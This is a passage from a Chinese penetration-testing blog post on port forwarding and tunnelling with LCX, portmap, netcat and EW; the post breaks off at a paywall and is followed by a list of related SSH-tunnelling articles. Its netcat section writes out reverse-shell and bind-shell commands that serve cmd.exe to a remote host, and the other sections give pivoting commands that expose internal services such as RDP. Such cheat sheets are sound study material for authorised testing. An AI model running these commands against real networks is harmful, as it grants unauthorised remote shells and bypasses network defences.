端口转发与隧道

最新推荐文章于 2026-03-29 03:18:25 发布

原创

最新推荐文章于 2026-03-29 03:18:25 发布 · 928 阅读

标签

#渗透测试

收录于

本文详细介绍了几种端口转发技术，包括LCX、PORTMAP、NC反弹、EW工具和reGeorg+Proxychains的使用，以及FRP内网穿透的配置步骤。通过这些方法，可以实现在不同网络环境下的端口映射和流量转发，为渗透测试和远程访问提供了便利。

LCX端口转发

正向转发
内网主机执行：lcx.exe –slave 公网主机IP 公网主机端口内网主机IP 内网主机端口

外网主机执行：Lcx.exe –listen 公网主机端口1 公网主机端口2

反向转发
外网主机执行：Lcx.exe -tran 53 目标主机IP 3389

PORTMAP端口转发

正向转发
内网主机执行：./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666

外网主机执行：./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777

反向转发
外网主机执行：./portmap -m1 -p1 6666 -h2 目标主机IP -p2 22

NC反弹

反向连接
在公网主机进行监听：nc -lvp 4444

在内网主机执行：nc -t -e cmd.exe 公网主机IP 4444

正向连接
远程主机执行：nc -l -p 4444 -t -e cmd.exe

攻击主机执行：nc -vv 远程主机IP 4444

EW工具使用

端口转发

反向转发

./ew_for_Linux64 -s lcx_tran -l 1080 -f 内网主机IP -g 3389

正向转发

公网执行：ew -s lcx_listen -l 1080 -e 8080
内网执行：ew -s lcx_slave -d 192.168.0.31 -e 8080 -f 192.168.5.101 -g 22

流量转发

正向代理

ew -s ssocksd -l 8888 开启 8888端口的socks 代理

反向代理

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

amd6700k

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

使用SSH做端口转发以及反向隧道

谢公子的博客

06-01

1万+

目录 SSH做本地端口转发 SSH做反向隧道(远程端口转发) 用autossh建立稳定隧道 SSH开启端口转发需要修改 /etc/ssh/sshd_config配置文件，将 GatewayPorts修改为yes -f 后台执行ssh指令 -C 允许压缩数据 -N 不执行远程指令 -R 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口 -L 本地端口转发 -D 动态端口转...

参与评论您还未登录，请先登录后发表或查看评论

finalshell 隧道访问 - 通过两层SSH登录

清幽小路的博客

03-25

4018

目录VSCode - Remote SSH配置finalshell - 解决两层跳板问题配置跳板机配置隧道配置目标机使用 VSCode - Remote SSH 服务器部署在Linux远程机器上时，需要用SSH连接，然后用text editor去修改源文件。VSCode的插件Remote-SSH，使得界面可视化，可以用IDE写代码并上传。配置扩展搜索 (under view, select Extensions) remote-ssh 安装左侧导航栏出现一个电脑图标，选择并添加目标机 (ssh re

FinalShell实战：三步搞定Linux服务器远程连接的优雅配置

weixin_29250573的博客

02-21

387

本文详细介绍了使用FinalShell高效配置Linux服务器远程连接的完整流程。从确保网络连通性基础，到FinalShell的安装、新建SSH连接及关键参数设置，再到文件传输、端口转发等进阶功能，提供了三步实现优雅配置的实战指南。文章还分享了连接保持、批量操作等实用技巧与安全最佳实践，帮助运维人员和开发者提升工作效率与连接安全性。

Mac用户告别Xshell焦虑：FinalShell配置跳板机SSH连接保姆级教程（含隧道设置避坑点）

最新发布

weixin_30823001的博客

03-29

512

本文为Mac用户提供FinalShell配置跳板机SSH连接的详细教程，帮助用户告别Xshell焦虑。内容涵盖FinalShell的安装、基础配置、跳板机连接设置及隧道配置的避坑点，特别适合需要处理复杂网络环境的运维和开发人员。

FinalShell连接阿里云ECS的5个隐藏技巧（附端口转发配置）

jj890的博客

02-20

510

本文详细介绍了FinalShell连接阿里云ECS的5个隐藏技巧，包括会话保持优化、高级端口转发配置、集群批量操作、文件传输同步和性能监控。特别针对Linux服务器管理，提供了实用的SSH客户端配置建议和端口转发设置方法，帮助开发者提升远程管理效率。

ssh端口转发教程

高性价比服务器就选：蓝易云

07-27

561

您可以根据您的需求和情况进行进一步的调整和配置。假设您想要将目标主机上的某个端口（例如目标主机的端口3000）转发到本地主机上的某个端口（例如本地主机的端口8888）。假设您想要将本地主机的某个端口（例如本地主机的端口8000）转发到目标主机上的某个端口（例如目标主机的端口80）。这将在本地主机的8000端口上建立一个转发通道，将所有传入的连接重定向到目标主机的localhost（即目标主机自身）的80端口上。这将在目标主机上建立一个转发通道，将所有传入的连接重定向到本地主机的8888端口上。

windows系统finalshell隧道转发

xu_haipeng的博客

05-21

1147

首先连接上跳板机连接上后点击隧道进入隧道配置配置好示例然后重新创建一个连接对就是刚刚在隧道设置的绑定ip和端口，密码还是公钥还是其他看你自己有什么，得是对应目标地址的用户和密码（公钥）；这个新的连接就是你想去的那个目标服务器了。如果有碰到connect to host localhost port 20622: Connection refused或者java.net.ConnectException: Connection refused: connect基本都是你本地端口没打开

细说SSH隧道——本地端口转发

LainWith的博客

05-30

1万+

目录前言本地端口转发举例1：服务器与SSH远程主机是分开的命令网络拓扑环境配置开始连接（-L连接）登录用户流量分析办公网（VM1网卡）：外网（NAT-VM8网卡）家庭电脑抓包（eth0网卡）SSH参数的选取【重点】❗❗❗退出了shell之后会怎样静默连接（-N -L）后台静默连接（-f -N -L）最终版（-C -f -N -L）举例2：SSH远程主机是服务器网络拓扑开始连接命令变形举例3：连接远程桌面部署rdesktop开始连接重新连接案例4：把自己共享给所有人办公电脑连接其他电脑连接案例5：基于SSH使

SSH隧道与端口转发及内网穿透

热门推荐

勿弃字纸

09-13

2万+

SSH隧道与端口转发及内网穿透大家都知道SSH是一种安全的传输协议，用在连接服务器上比较多。不过其实除了这个功能，它的隧道转发功能更是吸引人。下面是个人根据自己的需求以及在网上查找的资料配合自己的实际操作所得到的一些心得。 SSH/plink命令的基本资料：首先，认识下这三个非常强大的命令： ssh -C -f -N -g -L listen_port:DS

SSH 隧道-本地端口/远程端口转发

m0_68564529的博客

09-07

3654

如果需要传输敏感数据到远程服务器，并且希望避免在不安全的网络中直接传输，可以使用本地端口转发，将不安全的服务流量通过 SSH 加密。例如，可以将本地的 VPN 服务转发到远程服务器，这样远程用户可以通过连接到远程服务器来间接访问本地网络。SSH 隧道的主要功能之一是端口转发，它是一种通过 SSH 协议在本地和远程主机之间建立安全通道，实现端口之间的数据转发的方法。通过使用SSH建立隧道，可以转发A设定的本地端口8000，通过SSH隧道将本地8000的请求转发到服务器B的80。

ssh本地端口转发，远程端口转发，隧道（这个解释不饶）

墨痕诉清风的博客

04-20

5990

创建隧道时的常用选项 “-L选项”：表示使用本地端口转发创建ssh隧道 “-R选项”：表示使用远程端口转发创建ssh隧道 “-N选项”：表示创建隧道以后不连接到sshServer端，通常与”-f”选项连用 “-f选项”：表示在后台运行ssh隧道，通常与”-N”选项连用 “-g选项”：表示ssh隧道对应的转发端口将监听在主机的所有IP中，不使用”-g选项”时，转发端口默认只监听在主机的本地回环地址中，”-g”表示开启网关模式，远程端口转发中，无法开启网关功能。本地端口转发命令 # 所有访

finalshell配置隧道

fhw925464207的博客

06-07

5386

名称随便填，监听端⼝：重要的，需要记住，等会⼉配置⽬标主机连接的时候，需要⽤到。打开新增SSH连接，配置跳板机的主机地址、端⼝、⽤户名、密码。跳板机：192.168.1.64:60022。⽬标机：192.168.3.142:22。绑定IP：本地ip，127.0.0.1。主机：填写第⼆步隧道⾥⾯绑定的ip。通过堡垒机，连接到指定的服务器。端⼝：填写第⼆步隧道⾥⾯监听端⼝。认证：⽬标主机的⽤户名密码。再打开⽬标主机的连接窗⼝。⽬标地址：⽬标主机ip。⽬标端⼝：⽬标主机端⼝。先打开跳板机的连接窗⼝。

FinalShell配置隧道

Wcybaonier

08-18

3062

跳转机：172.18.10.1:22 目标主机：10.0.0.1:9011 1. 配置跳转机打开新增SSH连接，配置跳转机的主机地址、端口、用户名、密码 2. 配置隧道名称：随便填，比如我喜欢用目标主机的ip 监听端口：重要！！！需要记住，待会配置目标主机连接的时候，需要用到绑定ip：本地ip，127.0.0.1 目前地址：目标主机ip 目标端口：目标主机端口 3. 新增目的主机连接主机：填写第2步隧道里面的绑定ip 端口：第2步隧道里面的监听端口认证：目标主机的用...

通过FinalShell隧道转发二次连接远程服务器

m18066975852的博客

12-14

584

首先有两个远程服务器，服务器1可以直连，服务器2不能直连，需要通过服务器1转接连到服务器2。4.连接的时候先打开链接1连接到服务器1，再打开连接2连接到服务器2.1.新建一个连接，连接到服务器1。

Finalshell实战：5个高效管理Linux服务器的技巧

CyanWave34的博客

12-03

374

实际体验下来，Finalshell的这些功能确实能帮助运维人员节省大量时间，特别是配合InsCode平台的快速部署能力，让工具开发和管理变得更加高效。作为一名经常需要管理多台Linux服务器的运维人员，我一直在寻找能够提升工作效率的工具。在日常运维中，经常需要在多台服务器上执行相同的命令。Finalshell内置的文件管理器支持直观的左右分屏对比，可以轻松比较本地和远程服务器的文件差异。我在排查服务器性能问题时，会同时打开多个标签页监控不同服务器的状态，通过对比快速定位异常节点。在使用过程中，我发现。

【内网—内网转发】——代理转发_SSH代理转发

weixin_45588247的博客

09-22

2745

文章目录一、环境准备：二、工具：三、概念：四、学习目的：五、SSH代理转发介绍：六、SSH代理转发使用说明：七、SSH代理转发：1. 正向动态转发隧道：1.1 场景：1.2 网络拓扑图：1.3 说明：1.4 实验过程：一、环境准备：准备一台CentOS主机，并为CentOS主机添加一张网卡，并为它配置为处于内网环境。以下是网上配置过程： 1、添加网卡： 2、查看新添加的网卡mac地址: 3、找到新添加的网卡mac地址对应的是哪张网卡： 4、配置网卡：命令： cd /etc/sysco

通过FinalShell打通ssh隧道

m0_37866091的博客

12-28

8332

使用FinalShell可以快速地打通隧道。方法/步骤打开finalShell，点击上方文件夹图标，打开服务器列表。通过FinalShell打通ssh隧道在列表中选择一个要建立隧道的服务器。当然如果不在列表中，就可以新建ssh连接，可以参照我以前的经验文章查看如何进行ssh连接。点击右边的设置按钮通过FinalShell打通ssh隧道在弹出的设置对话框中，点击隧道，点击添加。通过FinalShell打通ssh隧道弹出新建隧道窗口。名称可以自定义。类型：举例，要把服务器与本机打通

Final Shell建立隧道

mandagod的博客

12-23

6279

1. FinalShell建立隧道堡垒机ssh连接建立：堡垒机不用设置代理服务器：堡垒机设置隧道：目的机器ssh连接：设置代理：设置隧道：在目的机器上启动Tensorboard，之后本地把这两个ssh建立连接，浏览器中输入localhost:16006，即可验证是否成功。 ...

finalshell ssh隧道配置

qq_41728581的博客

03-18

4193

之前用xshell ssh隧道很方便，最近用了finalshell 发现也还不错做个笔记省的忘位置连接管理这里右边齿轮代理服务器是指用代理去连接ssh，这里是要点击隧道有3种本地远程和s5 本地就是finalshell会在本地监听一个端口，用以访问远程服务器（及内网）的端口远程是finalshell在服务器上监听一个端口，用以访问本地电脑（及内网)上的一个端口 s5就是在本地监听一个端口，服务器直接开一个s5服务器转到本地举个例子图中我设置的远程端口77